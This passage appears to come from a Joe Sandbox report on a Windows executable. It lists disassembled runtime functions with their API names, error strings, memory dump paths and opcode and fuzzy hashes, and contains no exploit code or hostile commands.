                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                        • Opcode ID: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                                                                                        • Instruction ID: 91f8676f5144f9d3e0351ce47b97544b7f8d145d6b4e3a7ef9f6002b5871e135
                                                                                                                        • Opcode Fuzzy Hash: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                                                                                        • Instruction Fuzzy Hash: D481C975D2E14385F774AE39893C37EA690AB99F88FD74031CA09971B5CF2DE4019322
                                                                                                                        Function 00007FF7A673E108 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                        • String ID: MOC$RCC
                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                        • Opcode ID: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                                                                                        • Instruction ID: e920d965a943bce3b80c2cecd72af5d01fa7079a2ee0b26b3005951358cdcc2b
                                                                                                                        • Opcode Fuzzy Hash: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                                                                                        • Instruction Fuzzy Hash: B1617D33A19B458AE714DF65D8803AEB7A0FB48B88F954226EF4D17BA4CF38E055C710
                                                                                                                        Function 00007FF7A673E464 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                        • String ID: csm$csm
                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                        • Opcode ID: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                                                                                        • Instruction ID: 5f0aee9a31c1d9bab3ed19c00b2d7ff529d0812b4b145b7ec494741222a0ed67
                                                                                                                        • Opcode Fuzzy Hash: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                                                                                        • Instruction Fuzzy Hash: 1151B43252A241C6DB78AF15996436AB7A0EB48F88FD54136EB8C47BE5DF3CE490C710
                                                                                                                        Function 00007FF7A67324D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                        • String ID: %s%s: %s$Fatal error detected
                                                                                                                        • API String ID: 1878133881-2410924014
                                                                                                                        • Opcode ID: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                                                                                        • Instruction ID: 4810ebe8bc86fe6f684e84b1982e5981d339a725d5a9dff36c52a373e96f016a
                                                                                                                        • Opcode Fuzzy Hash: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                                                                                        • Instruction Fuzzy Hash: 0831527263968191E624FB15E8617EBA364FB88B84FC14036EA8D076ADDF3CD345CB50
                                                                                                                        Function 00007FF7A6733BA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF7A6733699), ref: 00007FF7A6733BD1
                                                                                                                          • Part of subcall function 00007FF7A6732620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7A6737744,?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A6732654
                                                                                                                          • Part of subcall function 00007FF7A6732620: MessageBoxW.USER32 ref: 00007FF7A673272C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastMessageModuleName
                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                        • API String ID: 2581892565-1977442011
                                                                                                                        • Opcode ID: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                                                                                        • Instruction ID: 62a6f9810cd1372a3b3e7a33e0deac1303f6ec85fe4f31ac37e7cbee09983d67
                                                                                                                        • Opcode Fuzzy Hash: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                                                                                        • Instruction Fuzzy Hash: 59017121B3E64280FA25B720EC363B79251AF5CB84FC21131D94E866A6EE5CE5458620
                                                                                                                        Function 00007FF7A674BA70 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2718003287-0
                                                                                                                        • Opcode ID: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                                                                                        • Instruction ID: 8de88a1d6e9d794fc057bfac79645af268bbfba137fef6a5024abe3c0ebf9d3b
                                                                                                                        • Opcode Fuzzy Hash: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                                                                                        • Instruction Fuzzy Hash: FAD12372B2AA8089E711DF75C8982AD77B1FB48F98F814275CE4D57BA9DE38D406C310
                                                                                                                        Function 00007FF7A67447D4 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2780335769-0
                                                                                                                        • Opcode ID: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
                                                                                                                        • Instruction ID: cfe0db078f3be9395abdb6d9927c61b9a8a106b68e73939dcb95e28b1ca7b5a4
                                                                                                                        • Opcode Fuzzy Hash: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
                                                                                                                        • Instruction Fuzzy Hash: 6851A222E2565189FB10EF60D86837E73A5EB4CB98F524134DE0E476A9DF38D4419360
                                                                                                                        Function 00007FF7A6731F70 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1956198572-0
                                                                                                                        • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                        • Instruction ID: 68591607e6230edff6fe4d72b08be3855edc5b8599ff366e06f3d8e5ce5c5ffa
                                                                                                                        • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                        • Instruction Fuzzy Hash: B611EC21E3914341F654A769ED642BBA352EF8DF80FC59030E94906BADCE2CD8C54510
                                                                                                                        Function 00007FF7A6754D3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                        • Opcode ID: c6b54485bead06bc5539c244e4ab75d05ddcaebff17989ae90453d9827129cd1
                                                                                                                        • Instruction ID: 1714ae76598f98d51f777c74db8c979bba07488f1869dc36a15025cd87919f93
                                                                                                                        • Opcode Fuzzy Hash: c6b54485bead06bc5539c244e4ab75d05ddcaebff17989ae90453d9827129cd1
                                                                                                                        • Instruction Fuzzy Hash: 88411712A2939245FB60AB259C2537BA7A0EF88FA4F954235EF5C07AFDDE3CD4418710
                                                                                                                        Function 00007FF7A6747E6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A6747E9E
                                                                                                                          • Part of subcall function 00007FF7A6749E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E2E
                                                                                                                          • Part of subcall function 00007FF7A6749E18: GetLastError.KERNEL32(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E38
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7A673B105), ref: 00007FF7A6747EBC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                        • String ID: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe
                                                                                                                        • API String ID: 3580290477-3130841589
                                                                                                                        • Opcode ID: 3943842da798c31a181edbdfd7e827be925f8530d91395b67a93139410b16115
                                                                                                                        • Instruction ID: 02e28a836de43f07def23f23ec2249b09c5de4d036f767046236a3b52fddb5d3
                                                                                                                        • Opcode Fuzzy Hash: 3943842da798c31a181edbdfd7e827be925f8530d91395b67a93139410b16115
                                                                                                                        • Instruction Fuzzy Hash: 5B417532A2AB5285E715EF259CA90FEA394EB4CF84B964035E90E437A5DF3CD4428760
                                                                                                                        Function 00007FF7A674C108 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                        • String ID: U
                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                        • Opcode ID: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                                                                                        • Instruction ID: f21d2be5593afd600457076ded09f1a10c3b1e3417ebb65cf6d1b9908a330a22
                                                                                                                        • Opcode Fuzzy Hash: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                                                                                        • Instruction Fuzzy Hash: 8041B462639A4186DB20EF65E8583AAB761FB88B84F814031EE4D87768EF3CD441C750
                                                                                                                        Function 00007FF7A674E508 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                        • Opcode ID: c96ce3ad044416fb9599911189556e1cf2cbbd82c862d3c5499b8d6e200c136e
                                                                                                                        • Instruction ID: afb14a2ca880b41891211c45a380e1bc505af793a2830bc76cf56b3644ec5ddc
                                                                                                                        • Opcode Fuzzy Hash: c96ce3ad044416fb9599911189556e1cf2cbbd82c862d3c5499b8d6e200c136e
                                                                                                                        • Instruction Fuzzy Hash: B521C362A2964181EB20AB15DC6C27EF3A1FB8CF44FC68035D68D03694EF7CE585C761
                                                                                                                        Function 00007FF7A6732770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                        • String ID: Fatal error detected
                                                                                                                        • API String ID: 1878133881-4025702859
                                                                                                                        • Opcode ID: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                                                                                        • Instruction ID: 78d790e0066c0ef87a1f40935cd2e3b8141237eaf3f44cfb3c3b7cc64f844447
                                                                                                                        • Opcode Fuzzy Hash: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                                                                                        • Instruction Fuzzy Hash: 3621A77263D68191E724EB51F8617EBA354FB88B88FC14135EA8D07669DF3CD205C750
                                                                                                                        Function 00007FF7A6732880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                        • String ID: Error detected
                                                                                                                        • API String ID: 1878133881-3513342764
                                                                                                                        • Opcode ID: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                                                                                        • Instruction ID: 153d999c106b5e804a5fcbbd959cca6a20fe4a70486c20caee0b218e0714709a
                                                                                                                        • Opcode Fuzzy Hash: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                                                                                        • Instruction Fuzzy Hash: DC21777263968191E724EB10F8617EBB354FB88B88FC15135EA8D47669DF3CD205C750
                                                                                                                        Function 00007FF7A673EFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                        • Opcode ID: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                                                                                        • Instruction ID: 43d72c1381a4b80621019ebd0712dd1db888edf61f0ef760237294eacd75cc3f
                                                                                                                        • Opcode Fuzzy Hash: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                                                                                        • Instruction Fuzzy Hash: AF115132629B8182EB659F15F85026AB7A4FB88F94F994231EF8C07768DF3DD551CB00
                                                                                                                        Function 00007FF7A674F00C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                        • Opcode ID: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                                                                                        • Instruction ID: 393aaa7b6f81502a73771b35e1a9c19dffcb8af2cfe3c03454dab9f695e06b0e
